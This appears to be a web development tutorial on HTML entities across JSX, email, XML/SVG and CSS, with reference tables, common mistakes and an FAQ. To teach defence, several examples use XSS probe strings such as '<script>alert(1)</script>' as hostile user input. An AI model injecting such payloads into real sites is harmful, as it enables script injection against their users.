const Comment = () => <p>{userInput}</p>;
// Renders as: <p>&lt;script&gt;alert("xss")&lt;/script&gt;</p>
// Browser displays: <script>alert("xss")</script> (as text, not code)

// dangerouslySetInnerHTML bypasses auto-escaping — use with extreme caution
const TrustedHtml = ({ html }) => (
  <div dangerouslySetInnerHTML={{ __html: html }} />
);
// Only use when html is sanitized by DOMPurify or similar

Using HTML Entities in JSX Source Code

// In JSX text (outside {}), HTML entity names and numeric codes are supported
// Option 1: HTML entity name in JSX text
const Pricing = () => (
  <p>Price: &euro;49 &mdash; &copy; 2025</p>
);
// &euro;, &mdash;, and &copy; are decoded by the JSX compiler at build time,
// not by the browser. Inside {} expressions they would stay literal text.

// Option 2: Unicode escape in JS string
const Pricing2 = () => (
  <p>Price: {'\u20AC'}49 {'\u2014'} {'\u00A9'} 2025</p>
);

// Option 3: Literal Unicode characters in JSX (requires UTF-8 source file)
const Pricing3 = () => (
  <p>Price: €49 — © 2025</p>
);
// This is the cleanest approach for UTF-8 React projects

// Option 4: HTML entity codes in JSX text (NOT in expressions)
// These must be inside JSX text, not inside {}
const Arrow = () => <span>&rarr;</span>;   // renders →
const Copyright = () => <span>&copy;</span>; // renders ©

// Common JSX entity pitfall: apostrophes in text
// FLAGGED: valid JSX, but the ESLint rule react/no-unescaped-entities reports it
// const Bad = () => <p>You're welcome</p>;

// CORRECT options:
const Good1 = () => <p>{"You're welcome"}</p>;  // string expression
const Good2 = () => <p>You&apos;re welcome</p>; // named entity
const Good3 = () => <p>You&#39;re welcome</p>;  // numeric entity
const Good4 = () => <p>You{"’"}re welcome</p>; // Unicode curly apostrophe

HTML Entities in JSX Attribute Values

// A quoted JSX attribute value is JSX text, not a JavaScript string:
// the JSX compiler decodes HTML entities in it, just as it does in JSX text.
// Entities inside a {} expression are plain JavaScript and are NOT decoded.

// WRONG: an entity inside a JavaScript string expression stays literal
const BadTitle = () => <div title={"Tom &amp; Jerry"}>...</div>;
// The title will be "Tom &amp; Jerry" literally, not "Tom & Jerry"!

// CORRECT: use literal characters, which work in both forms
const GoodTitle1 = () => <div title="Tom & Jerry">...</div>;   // literal &
const GoodTitle2 = () => <div title={"Tom & Jerry"}>...</div>; // JS string

// For aria labels and similar attributes
const Icon = () => (
  <button aria-label={"Copy to clipboard &rarr;"}>  {/* WRONG: label contains the text "&rarr;" */}
    Copy
  </button>
);

const IconFixed = () => (
  <button aria-label="Copy to clipboard →">  {/* CORRECT */}
    Copy
  </button>
);

HTML Entities in Email, XML, and Other Contexts

HTML Entities in Email Templates

HTML email has inconsistent and often outdated rendering engines. Entity encoding is critical for email compatibility because many email clients use older HTML parsing engines.

<!-- HTML Email Best Practices for Entities -->

<!-- Always encode &, <, >, " in email HTML content -->
<p>Tom &amp; Jerry Newsletter &mdash; Issue #42</p>

<!-- Use numeric entities for special characters in email -->
<!-- Named entities like &mdash; &lsquo; &rsquo; may not be supported in all clients -->
<p>Tom &amp; Jerry Newsletter &#8212; Issue #42</p>  <!-- safer -->

<!-- Non-breaking spaces are widely supported -->
<td>100&nbsp;items</td>

<!-- Emoji in email: use UTF-8 encoding + declare in <head> -->
<!-- Some clients strip emoji, so the surrounding text should read fine without it -->
<p>&#127881; Happy New Year!</p>

<!-- Copyright in email footer -->
<p>&copy; 2025 Company Name. All rights reserved.</p>
<p>&#169; 2025 Company Name. All rights reserved.</p>  <!-- numeric fallback -->
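
The numeric-entity advice above can be automated. The following is a minimal sketch, assuming the email body is generated in Python; `to_email_safe` is a hypothetical helper name, not part of any library. It escapes the HTML-special characters first and then rewrites every non-ASCII character as a decimal numeric entity using the standard `xmlcharrefreplace` error handler.

```python
import html


def to_email_safe(text: str) -> str:
    """Escape HTML-special characters, then turn every non-ASCII
    character into a decimal numeric entity (&#NNNN;)."""
    escaped = html.escape(text, quote=True)  # handles & < > " '
    # 'xmlcharrefreplace' replaces characters ASCII cannot encode with &#NNNN;
    return escaped.encode("ascii", "xmlcharrefreplace").decode("ascii")


print(to_email_safe("Tom & Jerry Newsletter \u2014 \u00a9 2025"))
# Tom &amp; Jerry Newsletter &#8212; &#169; 2025
```

The result is pure ASCII, so it survives clients and gateways that mishandle the declared charset. Apply it only to text content, not to markup you intend to keep.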

HTML Entities in XML and SVG

XML is stricter than HTML: the XML specification itself predefines only five entities, and any other named entity must be declared in a DTD before it can be used. SVG markup embedded in an HTML document follows HTML entity rules; SVG served as a standalone XML file follows XML rules.

<!-- XML predefined entities (the only 5 built-in XML entities) -->
&amp;   <!-- & -->
&lt;    <!-- < -->
&gt;    <!-- > -->
&quot;  <!-- " -->
&apos;  <!-- ' -->

<!-- In XML, other named entities like &copy; &mdash; are NOT defined! -->
<!-- You must use numeric entities or declare them in the DOCTYPE -->
<?xml version="1.0" encoding="UTF-8"?>
<document>
  <text>Copyright &#169; 2025 &#8212; All rights reserved.</text>
  <formula>x &#60; y &#38;&#38; y &#62; 0</formula>
</document>

<!-- SVG text in HTML — HTML entity rules apply -->
<svg xmlns="http://www.w3.org/2000/svg" width="200" height="50">
  <text x="10" y="30">Tom &amp; Jerry &rarr;</text>
</svg>

<!-- SVG as standalone XML file — XML rules apply -->
<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg">
  <text>Tom &amp; Jerry &#8594;</text>  <!-- &rarr; not valid in XML! -->
</svg>
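
When existing HTML text has to be moved into an XML or standalone SVG file, the named entities need to be converted. Here is one possible sketch using only the Python standard library; `html_text_to_xml` is an illustrative name, and the function assumes its input is text content rather than markup.

```python
import html
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape


def html_text_to_xml(fragment: str) -> str:
    """Convert entity-encoded HTML text into text that is valid in XML."""
    decoded = html.unescape(fragment)   # &rarr; becomes the arrow, &amp; becomes &
    xml_safe = escape(decoded)          # re-escape only &, < and >
    # Emit remaining non-ASCII characters as numeric references
    return xml_safe.encode("ascii", "xmlcharrefreplace").decode("ascii")


svg_text = html_text_to_xml("Tom &amp; Jerry &rarr;")
print(svg_text)  # Tom &amp; Jerry &#8594;

# The result parses as XML, which the original &rarr; would not
element = ET.fromstring(f"<text>{svg_text}</text>")
print(element.text)  # Tom & Jerry →
```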

HTML Entities in CSS content Property

/* CSS content property — does NOT understand HTML entities */

/* WRONG — HTML entities do not work in CSS */
.icon::before {
  content: '&rarr;';  /* Renders literally as "&rarr;" — NOT an arrow! */
}

/* CORRECT — use Unicode escape sequences in CSS */
.icon::before {
  content: '\2192';  /* Unicode escape for → (U+2192) */
}

.copyright::after {
  content: '\00A9';  /* © copyright symbol */
}

.dash::before {
  content: '\2014 ';  /* em dash — */
}

/* Or embed the actual Unicode character directly */
.check::before {
  content: '✓';  /* Direct Unicode character — works in UTF-8 CSS files */
}

/* Common Unicode values for CSS content */
/* \201C = “ left double quote    */
/* \201D = ” right double quote   */
/* \2018 = ‘ left single quote    */
/* \2019 = ’ right single quote   */
/* \2026 = … ellipsis             */
/* \00AB = « left guillemet       */
/* \00BB = » right guillemet      */

Complete HTML Special Characters by Category

Punctuation and Typography

Character	Named	Numeric	Use case
‘	&lsquo;	&#8216;	Left single quotation mark: ‘quoted’
’	&rsquo;	&#8217;	Right single quotation mark / apostrophe: it’s
“	&ldquo;	&#8220;	Left double quotation mark: “quoted”
”	&rdquo;	&#8221;	Right double quotation mark: “quoted”
…	&hellip;	&#8230;	Horizontal ellipsis: continued…
–	&ndash;	&#8211;	En dash: used in ranges (2010–2020)
—	&mdash;	&#8212;	Em dash: sentence break or parenthetical
«	&laquo;	&#171;	Left guillemet: «French-style quote»
»	&raquo;	&#187;	Right guillemet: «French-style quote»
·	&middot;	&#183;	Middle dot · interpunct
•	&bull;	&#8226;	Bullet point •
§	&sect;	&#167;	Section sign § (legal documents)
¶	&para;	&#182;	Pilcrow / paragraph sign ¶
†	&dagger;	&#8224;	Dagger † (footnote marker)
‡	&Dagger;	&#8225;	Double dagger ‡ (footnote marker)

Mathematical Symbols

Symbol	Named	Numeric	Description
±	&plusmn;	&#177;	Plus-minus ±
×	&times;	&#215;	Multiplication ×
÷	&divide;	&#247;	Division ÷
≈	&asymp;	&#8776;	Approximately equal ≈
≠	&ne;	&#8800;	Not equal ≠
≤	&le;	&#8804;	Less-than or equal ≤
≥	&ge;	&#8805;	Greater-than or equal ≥
∞	&infin;	&#8734;	Infinity ∞
√	&radic;	&#8730;	Square root √
∑	&sum;	&#8721;	Summation ∑
∏	&prod;	&#8719;	Product ∏
∫	&int;	&#8747;	Integral ∫
∅	&empty;	&#8709;	Empty set ∅
∈	&isin;	&#8712;	Element of ∈
∉	&notin;	&#8713;	Not element of ∉
∩	&cap;	&#8745;	Intersection ∩
∪	&cup;	&#8746;	Union ∪
⊂	&sub;	&#8834;	Subset of ⊂
⊃	&sup;	&#8835;	Superset of ⊃
²	&sup2;	&#178;	Superscript 2 (squared) ²
³	&sup3;	&#179;	Superscript 3 (cubed) ³
¼	&frac14;	&#188;	Vulgar fraction one quarter ¼
½	&frac12;	&#189;	Vulgar fraction one half ½
¾	&frac34;	&#190;	Vulgar fraction three quarters ¾

Arrows

Arrow	Named	Numeric	Description
←	&larr;	&#8592;	Leftwards arrow
→	&rarr;	&#8594;	Rightwards arrow
↑	&uarr;	&#8593;	Upwards arrow
↓	&darr;	&#8595;	Downwards arrow
↔	&harr;	&#8596;	Left right arrow
⇐	&lArr;	&#8656;	Leftwards double arrow
⇒	&rArr;	&#8658;	Rightwards double arrow
⇔	&hArr;	&#8660;	Left right double arrow
↵	&crarr;	&#8629;	Downwards arrow with corner leftwards (carriage return)
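
The named and numeric forms in the tables above can also be looked up programmatically. The following sketch uses Python's standard `html.entities.codepoint2name` mapping, which covers the HTML 4 entity set (all characters listed in these tables). `entity_forms` is an illustrative helper name.

```python
from html.entities import codepoint2name


def entity_forms(ch: str):
    """Return (named, decimal, hexadecimal) entity forms for one character.
    The named form is None when no HTML 4 entity name exists."""
    cp = ord(ch)
    name = codepoint2name.get(cp)
    named = f"&{name};" if name else None
    return named, f"&#{cp};", f"&#x{cp:X};"


print(entity_forms("\u2192"))  # ('&rarr;', '&#8594;', '&#x2192;')
print(entity_forms("\u2021"))  # ('&Dagger;', '&#8225;', '&#x2021;')
print(entity_forms("\u2713"))  # (None, '&#10003;', '&#x2713;')
```

The last call shows the fallback case: the check mark has no name in this mapping, so only the numeric forms are available.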

Common HTML Entity Mistakes and How to Fix Them

Mistake 1: Forgetting to Encode Ampersands in URLs

<!-- WRONG — the & breaks HTML validation and may confuse parsers -->
<a href="https://example.com/api?foo=1&bar=2&baz=3">API Call</a>

<!-- CORRECT — encode & as &amp; in HTML attribute values -->
<a href="https://example.com/api?foo=1&amp;bar=2&amp;baz=3">API Call</a>

<!-- Also wrong in meta refresh -->
<meta http-equiv="refresh" content="0; url=https://example.com?a=1&b=2">
<!-- CORRECT -->
<meta http-equiv="refresh" content="0; url=https://example.com?a=1&amp;b=2">
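
When links are generated in code, the two encoding layers are applied in order: percent-encode the query parameters, then entity-encode the whole URL for the attribute. A minimal Python sketch, with `link` as a hypothetical helper and the URL and parameter names taken from the example above:

```python
import html
from urllib.parse import urlencode


def link(base: str, params: dict, label: str) -> str:
    """Build an <a> tag with a correctly encoded href."""
    url = f"{base}?{urlencode(params)}"            # layer 1: percent-encoding
    href = html.escape(url, quote=True)            # layer 2: entity encoding
    return f'<a href="{href}">{html.escape(label)}</a>'


print(link("https://example.com/api", {"foo": 1, "bar": 2, "q": "a&b"}, "API Call"))
# <a href="https://example.com/api?foo=1&amp;bar=2&amp;q=a%26b">API Call</a>
```

Note the two different treatments of `&`: the separators between parameters become `&amp;`, while the ampersand inside the value `a&b` becomes `%26`.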

Mistake 2: Double Encoding

<!-- Double encoding happens when already-encoded text is encoded again -->

<!-- Original text: Tom & Jerry -->
<!-- After first encode: Tom &amp; Jerry -->
<!-- After second encode: Tom &amp;amp; Jerry  <-- WRONG, shows literally -->

<!-- This often happens in templating chains where multiple layers encode the same variable -->

<!-- Fix: ensure encoding happens exactly once per output context -->

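// JavaScript double encoding prevention
// Assumes an encodeHtml(str) helper is in scope and that str is plain text:
// any markup in str is parsed, and its tags are dropped by textContent.
function safeEncode(str) {
  // First decode any existing entities to avoid double encoding
  const decoded = new DOMParser()
    .parseFromString(str, 'text/html')
    .documentElement.textContent;
  // Then encode once
  return encodeHtml(decoded);
}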

// Python double encoding prevention
import html
def safe_encode(text):
    # Decode first if the text might already be encoded
    decoded = html.unescape(text)
    # Then encode once
    return html.escape(decoded)
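
The effect of double encoding, and the trade-off of the decode-first workaround, can be seen in a few lines. This is a small illustrative sketch using only the standard `html` module; the sample strings are made up.

```python
import html

raw = "Tom & Jerry"
once = html.escape(raw)     # correct: encoded exactly once
twice = html.escape(once)   # the bug: an already-encoded value encoded again

print(once)   # Tom &amp; Jerry
print(twice)  # Tom &amp;amp; Jerry

# Trade-off of decode-then-encode: text that legitimately contains
# entity syntax is silently changed.
typed = "Write &amp; to show an ampersand"
print(html.escape(typed))                  # Write &amp;amp; to show an ampersand
print(html.escape(html.unescape(typed)))   # Write &amp; to show an ampersand
```

The last line renders as "Write & to show an ampersand", which is not what the user typed. For that reason the decode-first helpers are best treated as a repair tool for data of unknown origin. The more robust fix is to store raw text and encode once, at the point of output.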

Mistake 3: Using HTML Entities in CSS content Values

/* WRONG — HTML entities in CSS are treated as literal text */
.arrow::before { content: '&rarr;'; }  /* Shows: &rarr; */
.copy::after  { content: '&copy;'; }   /* Shows: &copy; */

/* CORRECT — use CSS Unicode escapes */
.arrow::before { content: '\2192'; }   /* Shows: → */
.copy::after  { content: '\00A9'; }   /* Shows: © */

/* Or embed actual characters directly (UTF-8 CSS file) */
.arrow::before { content: '→'; }
.copy::after  { content: '©'; }

Mistake 4: Not Encoding in JavaScript Contexts

// HTML entities are NOT interpreted inside <script> tags
// WRONG approach: thinking HTML encoding protects JS contexts

// If a server template outputs:
// <script>var name = "&lt;script&gt;alert(1)&lt;/script&gt;";</script>
// The JS string contains the literal characters &lt;script&gt;...
// Nothing is injected here, but the data is corrupted, and HTML encoding does not
// escape backslashes or line breaks, so this approach is fragile.

// The CORRECT approach: JSON-encode for JS contexts, then escape "<"
// JSON.stringify alone is not enough: a literal </script> inside the string
// would still close the script element.
// <script>var name = <%- JSON.stringify(userInput).replace(/</g, '\\u003c') %>;</script>
// => <script>var name = "\u003cscript>alert(1)\u003c/script>";</script>

// Node.js example (Express + EJS)
app.get('/profile', (req, res) => {
  res.render('profile', {
    // Pass raw data to template
    userName: req.user.name,
    // In EJS, JS context:   <%- JSON.stringify(userName).replace(/</g, '\\u003c') %>
    // In EJS, HTML context: <%= userName %>  (<%= escapes output; <%- outputs raw)
  });
});
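
The same idea applies on any server stack. Below is a minimal Python sketch of a script-safe serializer; `js_literal` is a hypothetical helper, not a library function. It serializes with `json.dumps` and then replaces `<`, `>` and `&` with JavaScript Unicode escapes, so the output can never contain `</script>` or `<!--`.

```python
import json


def js_literal(value) -> str:
    """Serialize value as a JavaScript literal that is safe to place
    inside an inline <script> element."""
    text = json.dumps(value)  # ensure_ascii=True also escapes U+2028/U+2029
    return (text.replace("<", "\\u003c")
                .replace(">", "\\u003e")
                .replace("&", "\\u0026"))


payload = "</script><script>alert(1)</script>"
snippet = f"<script>var name = {js_literal(payload)};</script>"
print(snippet)

# The escapes are ordinary JSON/JS string escapes, so the value round-trips
assert json.loads(js_literal(payload)) == payload
```

The browser's JavaScript engine decodes `\u003c` back to `<` inside the string, so the application sees the original value while the HTML parser never sees a closing tag.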

Mistake 5: Using &nbsp; for Visual Spacing

<!-- WRONG — using &nbsp; for visual indentation or spacing -->
<p>&nbsp;&nbsp;&nbsp;Indented text</p>
<p>First line<br>&nbsp;&nbsp;Second indented line</p>
<td>&nbsp;&nbsp;&nbsp;Cell content</td>

<!-- This is fragile, semantically meaningless, and bad for accessibility -->

<!-- CORRECT — use CSS for visual spacing -->
<p style="text-indent: 2em;">Indented text</p>
<p style="padding-left: 2em;">Second indented</p>
<td style="padding-left: 1.5rem;">Cell content</td>

<!-- &nbsp; has legitimate uses: -->
<!-- 1. Prevent line break between related words -->
<span>Dr.&nbsp;Smith</span>      <!-- name won't wrap between title and name -->
<span>100&nbsp;km/h</span>       <!-- unit won't separate from number -->
<td>No&nbsp;data</td>            <!-- prevent "No" and "data" from splitting across lines -->

<!-- 2. Keep an empty table cell from collapsing (legacy HTML) -->
<td>&nbsp;</td>
<!-- Modern alternative: CSS empty-cells or min-height -->

Frequently Asked Questions

What is an HTML entity?

An HTML entity is a string that begins with an ampersand (&) and ends with a semicolon (;), used to represent characters that have special meaning in HTML or that cannot be typed directly. For example, &amp; renders as & and &lt; renders as <. HTML entities exist in two forms: named entities (like &copy; for the copyright symbol) and numeric entities (decimal like &#169; or hexadecimal like &#xA9;).

Why must I encode & < > " in HTML?

These four characters have special syntactic meaning in HTML. The ampersand (&) starts entity (character) references. The less-than sign (<) opens HTML tags. The greater-than sign (>) closes HTML tags. The double quote (") delimits attribute values. If you include these characters literally in HTML content or attributes without encoding them, the browser may misinterpret your HTML structure, causing rendering errors or security vulnerabilities.

What is the difference between named and numeric HTML entities?

Named entities use a mnemonic name (e.g., &copy; for copyright, &nbsp; for non-breaking space). Numeric entities use the Unicode code point in decimal (&#169;) or hexadecimal (&#xA9;). Named entities are more readable but only exist for a subset of characters. Numeric entities work for any Unicode character. Both forms are equally valid in all modern browsers.

Does &apos; work in HTML?

&apos; (apostrophe entity) was not part of the original HTML 4 specification but was added in HTML5 and XHTML. It is now universally supported in modern browsers. However, for maximum compatibility with older HTML parsers, many developers use the numeric form &#39; or simply the literal apostrophe character inside double-quoted attributes. In XHTML documents, &apos; has always been valid because XHTML is an XML application.

What is &nbsp; and when should I use it?

&nbsp; is a non-breaking space character (Unicode U+00A0). Unlike a regular space, it prevents the browser from inserting a line break at that position, and unlike regular spaces, consecutive &nbsp; characters are rendered (regular spaces collapse to one). Use &nbsp; sparingly: for units after numbers (e.g., 100&nbsp;km), to keep names together (e.g., Dr.&nbsp;Smith), or to prevent unwanted wrapping in table cells. Do not use it for layout spacing; use CSS margins and padding instead.

How does HTML entity encoding prevent XSS attacks?

Cross-Site Scripting (XSS) attacks inject malicious HTML or JavaScript into web pages. When user-supplied text is rendered in an HTML context, special characters like < > & " must be encoded as HTML entities before insertion. For example, the script tag <script>alert(1)</script> becomes harmless when the < and > are encoded as &lt; and &gt; — the browser displays it as literal text rather than executing it as HTML. Server-side frameworks handle this automatically when using template escaping, but raw innerHTML assignments in JavaScript bypass these protections.
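
As a small illustration of the encoding step described above, here is a Python sketch. `render_greeting` is a made-up function that stands in for whatever a template engine does when it auto-escapes a variable.

```python
import html


def render_greeting(user_name: str) -> str:
    """Insert untrusted text into HTML text content, encoding it first."""
    return f"<p>Hello, {html.escape(user_name)}!</p>"


print(render_greeting("<script>alert(1)</script>"))
# <p>Hello, &lt;script&gt;alert(1)&lt;/script&gt;!</p>
```

The browser shows the script tag as visible text and runs nothing. This covers HTML text and quoted attribute values only; script, style, and URL contexts each need their own encoding.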

What is the difference between HTML entity encoding and URL encoding?

HTML entity encoding converts characters using the &name; or &#code; format and is used for embedding text safely in HTML documents. URL encoding (percent encoding) converts characters using the %XX format and is used for encoding data in URIs. They serve different contexts: HTML entities go in HTML files and templates; URL encoding goes in URLs and query strings. A URL inside an HTML attribute often requires both — the URL portion is percent-encoded, and then the HTML attribute value is entity-encoded.

Which HTML entities are required vs optional?

Required: & must always be encoded as &amp; in HTML text and attribute values. < must always be encoded as &lt; in HTML text content. In HTML attribute values delimited by double quotes, " must be encoded as &quot;. In HTML attribute values delimited by single quotes, apostrophes must be encoded as &apos; or &#39;. Optional but recommended: > can be used literally in most HTML text contexts but encoding as &gt; avoids edge cases. All other characters are optional — modern browsers handle the full UTF-8 character set directly, so accented letters, emoji, and symbols can be used as-is when the document declares UTF-8 charset.
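
The split between text content and attribute values maps directly onto the `quote` parameter of Python's standard `html.escape`, shown in this short sketch with a made-up sample string:

```python
import html

text = 'Tom & "Jerry" <3 it\'s'

# Text content: only &, < and > are encoded
print(html.escape(text, quote=False))
# Tom &amp; "Jerry" &lt;3 it's

# Attribute values: both quote characters are encoded as well
print(html.escape(text, quote=True))
# Tom &amp; &quot;Jerry&quot; &lt;3 it&#x27;s
```

`quote=True` is the default, which is the safer choice when the same helper feeds both contexts.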

Try the HTML Entity Encoder/Decoder

Encode and decode HTML entities instantly. Supports named entities, decimal, and hexadecimal numeric entities.

Open HTML Entity Tool →